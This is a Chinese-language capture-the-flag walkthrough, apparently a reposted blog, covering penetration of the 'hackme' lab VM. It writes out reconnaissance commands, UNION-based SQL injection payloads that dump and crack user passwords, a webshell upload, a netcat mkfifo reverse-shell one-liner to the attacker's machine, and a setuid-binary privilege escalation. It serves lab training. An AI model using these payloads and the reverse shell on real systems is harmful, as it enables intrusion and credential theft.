当前位置: 首页> 娱乐> 明星 > hackme靶机渗透~SQL注入+文件上传

hackme靶机渗透~SQL注入+文件上传

时间:2025/7/16 15:17:23来源:https://blog.csdn.net/weixin_67832625/article/details/141109871 浏览次数:0次

在这里插入图片描述

0x01信息收集

# 主机发现
arp-scan -l

image-20240801221745822!

# 端口扫描
nmap 192.168.66.0/24 --min-rate=1000

image-20240801221959809

# 目录扫描
dirsearch -u http://192.168.66.142

image-20240801222348567

0x02漏洞挖掘

SQL注入

# 进入主页发现登录页面,而且还可以注册用户

image-20240801222502122

# 注册用户 账号:admin 密码:password

image-20240801222805695

# 登录用户查看内容,点击search,发现有书单

image-20240801223115624

# 验证sql注入

image-20240801223603773

image-20240801223637994

# 发现存在SQL注入,使用sqlmap进爆库
sqlmap -u "http://192.168.66.142/welcome.php?id=1" --batch

image-20240801224611096

发现sqlmap没有扫出来,所以我们使用手工注入

# 使用手工注入   判断字节数
Windows OS' order by 4#

image-20240801224926135

image-20240801224946287

判断字节数是3

# 判断回显位置
1' union select 1,2,3 #

image-20240801225154975

# 判断数据库名
-1' union select database(),2,3#

image-20240801225424108

# 查看webapphacking下的所有表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

image-20240801225544815

# 查看users下的所有的字段
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

image-20240801225658267

# 查看user和pasword中的数据
-1' union select group_concat(user),group_concat(pasword),3 from users#

image-20240801225838190

# 将密码用MD5来解码  账号:user1 密码:hello

image-20240801230045591

剩下的用户名和密码用 一样的方法解决即可,这里就不一一列举。

文件上传

# 我们是用刚才爆破的账号和密码来登录,可以发现文件上传点

image-20240811154043293

# 上传木马并抓包进行测试连接

image-20240811154144631

image-20240811154419136

# 尝试访问一下,看一下上传的文件

image-20240811154718209

0x03反弹shell

# 可以看到我们上传的木马成功回显,直接用中国蚁剑进行连接

image-20240811154940116

# 我们在kali上开启一个监听端口8888
nc -lvvp 8888

image-20240811160522799

# 在蚁剑上输入讲shell反弹给kali
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 8888 >/tmp/f# ip为kali攻击机的   端口是kali开启的监听端口

image-20240811160836880

0x04 提权

# 识别现在所存在的用户
cat /etc/passwd | gerp /bin/bash

image-20240811161714149

# 在/home/legacy路径下发现一个二进制文件touchmenot,我们通过执行此文件发现提权到root用户
cd /home/legacy
./touchmenot

image-20240811162014587

这个靶场主要是让我们发现SQL注入,然后并进行提权。

好小子,离成功又近一步啊。

关键字:hackme靶机渗透~SQL注入+文件上传

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: